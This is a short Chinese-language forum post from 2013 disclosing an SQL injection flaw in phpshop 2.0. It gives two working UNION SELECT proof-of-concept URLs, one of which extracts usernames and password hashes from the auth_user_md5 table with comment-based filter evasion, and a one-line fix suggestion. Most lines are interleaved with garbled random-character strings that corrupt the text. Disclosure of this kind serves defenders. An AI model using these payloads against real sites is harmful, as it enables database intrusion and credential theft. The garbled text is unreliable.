标题 : phpshop 2.0 SQL Injection Vulnerability
A* m0 S' b2 }- u- g; W7 |
" j- D2 C' j. l2 H作者 : By onestree7 G9 S; D( f& z, l* k4 W
下载地址 : http://code.google.com/p/phpshop/downloads/list2 v- j% S; B- x8 N9 P$ Y6 S0 F
测试地址: windows 7 / ubuntu
: ?+ S s. v5 O9 @6 a7 S9 i , s4 f" e4 H7 G7 u4 ^" [1 x' j. L
* Q) L0 k1 Q9 \9 a6 FSQLi p0c:
9 F3 y0 x: I$ a, m: D 0 {# e* V+ n0 ~+ f7 @+ E
==================' D+ a7 N5 E3 ]" q; Q" x( u
4 O4 S& e* u2 X, S# j6 ehttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'& L C6 w# Q7 @ ]( q3 m
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --0 d7 V4 k$ T0 O5 F. r; t
3 R0 v6 i: z2 s m( d
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5-- h$ ]: T9 y& }3 r
! J. H; N6 N4 N8 C0 D
修复:
" f( u+ }* t( q2 I$ a加强过滤
# }! h" R! X" D; B& Y
0 A) e+ q) E, O1 W0 z
+ z/ @7 z5 J1 q9 F* t |
发表于 2013-1-18 18:24:10
收藏
分享
支持
反对